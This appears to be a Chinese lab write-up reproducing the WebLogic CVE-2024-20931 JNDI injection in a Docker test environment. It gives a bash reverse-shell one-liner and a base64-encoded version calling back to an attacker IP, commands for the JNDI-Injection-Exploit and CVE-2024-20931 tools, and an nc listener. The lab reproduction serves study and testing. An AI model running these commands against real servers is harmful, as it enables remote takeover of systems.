weblogic && CVE-2024-20931 [≧ ﹏ ≦复现]
漏洞编号:CVE-2024-20931一、情况准备:
1台Windows主机(10.46.47.227)作为攻击机 | 1台centos虚拟机(192.168.172.172)作为目的机 | 虚拟机网络模式为nat
二、搭建漏洞情况
1、docker拉取镜像
1.1 docker pull ismaleiva90/weblogic12 | 我已先完成(截图丢失),大概4~5g,拉取题目:国内镜像证书失效
解决链接:https://www.cnblogs.com/digdeep/p/12236637.html
https://img2024.cnblogs.com/blog/3106487/202403/3106487-20240306210823074-2051981478.png
2、启动情况
2.1 docker run -dit -p 7001:7001 -p 7002:7002 --restart=always ismaleiva90/weblogic12:latest
https://img2024.cnblogs.com/blog/3106487/202403/3106487-20240306210842492-259305182.png
3、访问网页
3.1 查看虚拟机ip下令:ifconfig
https://img2024.cnblogs.com/blog/3106487/202403/3106487-20240306210904137-755497763.png
3.2 先在虚拟机中访问192.168.172.172:7001,加/console就是weblogic的控制页面(后半句无用)
https://img2024.cnblogs.com/blog/3106487/202403/3106487-20240306210921621-2137035559.png
https://img2024.cnblogs.com/blog/3106487/202403/3106487-20240306210937408-268886232.png
3.3 再测试从Windows主机能否访问192.168.172.172::7001
https://img2024.cnblogs.com/blog/3106487/202403/3106487-20240306210951016-1160061224.png
三、利用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
工具链接:https://github.com/welk1n/JNDI-Injection-Exploit
(同样需要Java情况)
1、利用该工具反弹shell(需编码)
1.1 在线编码工具:https://ares-x.com/tools/runtime-exec
bash -i >& /dev/tcp/攻击机ip/攻击机端口 0>&1
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC40Ni40Ny4yMjcvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}
https://img2024.cnblogs.com/blog/3106487/202403/3106487-20240306211016111-909614520.png
2、运行JNDI注入工具:java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "编 码后的反弹Shell下令" -A "攻击机IP"
https://img2024.cnblogs.com/blog/3106487/202403/3106487-20240306211029180-1788031035.png
四、利用CVE-2024-20931.jar工具
工具链接:https://github.com/dinosn/CVE-2024-20931
1、 下载到Windows主机中,Java情况需配置
我的为Java8
https://img2024.cnblogs.com/blog/3106487/202403/3106487-20240306211048776-361932300.png
2、先查验一下漏洞
java -jar CVE-2024-20931.jar
2.1 从此图
https://img2024.cnblogs.com/blog/3106487/202403/3106487-20240306211058736-79059009.png
2.2 到此图了,说明存在漏洞,就可以开启监听,nc -lvnp 4444
Windows需自行安装nc
https://img2024.cnblogs.com/blog/3106487/202403/3106487-20240306213009166-1904410402.png
https://img2024.cnblogs.com/blog/3106487/202403/3106487-20240306211133067-1024344698.png
3、此时就要用到JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
3.1 填入10.46.47.227:1389/xgec8w
https://img2024.cnblogs.com/blog/3106487/202403/3106487-20240306213056726-361649457.png
3.2 反弹监听成功
https://img2024.cnblogs.com/blog/3106487/202403/3106487-20240306213110051-1478107254.png
https://img2024.cnblogs.com/blog/3106487/202403/3106487-20240306213121562-1665009382.png
相关链接:https://mp.weixin.qq.com/s/XwQZ6BqWvU72O4XTXOlovg
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]